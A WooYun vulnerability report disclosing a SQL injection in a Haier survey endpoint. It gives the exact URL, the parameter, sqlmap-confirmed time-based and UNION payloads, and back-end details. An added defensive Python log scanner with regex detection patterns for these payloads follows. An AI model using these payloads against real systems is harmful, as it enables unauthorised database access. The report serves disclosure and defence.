WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2015-06-16: Details reported to the vendor; awaiting vendor handling
2015-06-19: Vendor has confirmed; details disclosed to the vendor only
2015-06-29: Details disclosed to core white hats and experts in related fields
2015-07-09: Details disclosed to ordinary white hats
2015-07-19: Details disclosed to intern white hats
2015-08-03: Details disclosed to the public
Injection point: http://s.haier.com/sr/ajax/getJirSassIcon.jsp?surveyid=
Parameter: surveyid
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: surveyid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: surveyid=' AND (SELECT * FROM (SELECT(SLEEP(5)))VbuY) AND 'KVOw'='KVOw

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: surveyid=' UNION ALL SELECT NULL,CONCAT(0x716b6b6a71,0x664778526542576e6272,0x7178707171),NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows
web application technology: Apache 2.2.9, JSP
back-end DBMS: MySQL 5.0.12
Database: newsurvey
[243 tables]
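A defender-side check, added here and not part of the original report: the scanner below pulls the `surveyid` parameter out of Apache access-log lines and flags the two injection classes sqlmap reported above (time-based SLEEP probes and UNION extraction) plus the quote break-out both payloads share. The log lines, TEST-NET client addresses and timestamps are constructed for the example; only the request path and payload shapes come from the report.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed Apache access-log lines (not from the report). The two requests
# from 203.0.113.11 carry the same payload classes sqlmap reported above.
SAMPLE_LOG = """\
203.0.113.10 - - [16/Jun/2015:10:01:02 +0800] "GET /sr/ajax/getJirSassIcon.jsp?surveyid=1024 HTTP/1.1" 200 512
203.0.113.11 - - [16/Jun/2015:10:01:07 +0800] "GET /sr/ajax/getJirSassIcon.jsp?surveyid=%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VbuY%29%20AND%20%27KVOw%27%3D%27KVOw HTTP/1.1" 200 512
203.0.113.11 - - [16/Jun/2015:10:01:12 +0800] "GET /sr/ajax/getJirSassIcon.jsp?surveyid=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716b6b6a71%2C0x664778526542576e6272%2C0x7178707171%29%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 987
"""

# One indicator per technique class in the sqlmap output: a time-based probe
# (SLEEP inside a subquery), a UNION-based extraction, and the quote break-out
# both payloads share. Matching is done on the decoded parameter value only.
INDICATORS = {
    "time_based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union_based": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "quote_breakout": re.compile(r"^'|'\s*(AND|OR)\s+'", re.I),
}

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target, param="surveyid"):
    """Return the sorted indicator names that fire on `param` in a request target."""
    qs = parse_qs(urlparse(target).query, keep_blank_values=True)
    hits = set()
    for raw in qs.get(param, []):
        value = unquote_plus(raw)  # second decode pass catches double-encoded payloads
        hits.update(name for name, pat in INDICATORS.items() if pat.search(value))
    return sorted(hits)


def scan_log(text, param="surveyid"):
    """Return (client_ip, target, hits) for every request whose `param` looks injected."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group("target"), param)
        if hits:
            findings.append((line.split(" ", 1)[0], m.group("target"), hits))
    return findings


if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {', '.join(hits)} {target[:60]}...")
```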
Filter the input.
Severity: High
Vulnerability Rank: 16
Confirmation time: 2015-06-19 18:34
Thank you to the WooYun platform's white hats for the testing and the alert; we have assigned staff to handle it.
None at present.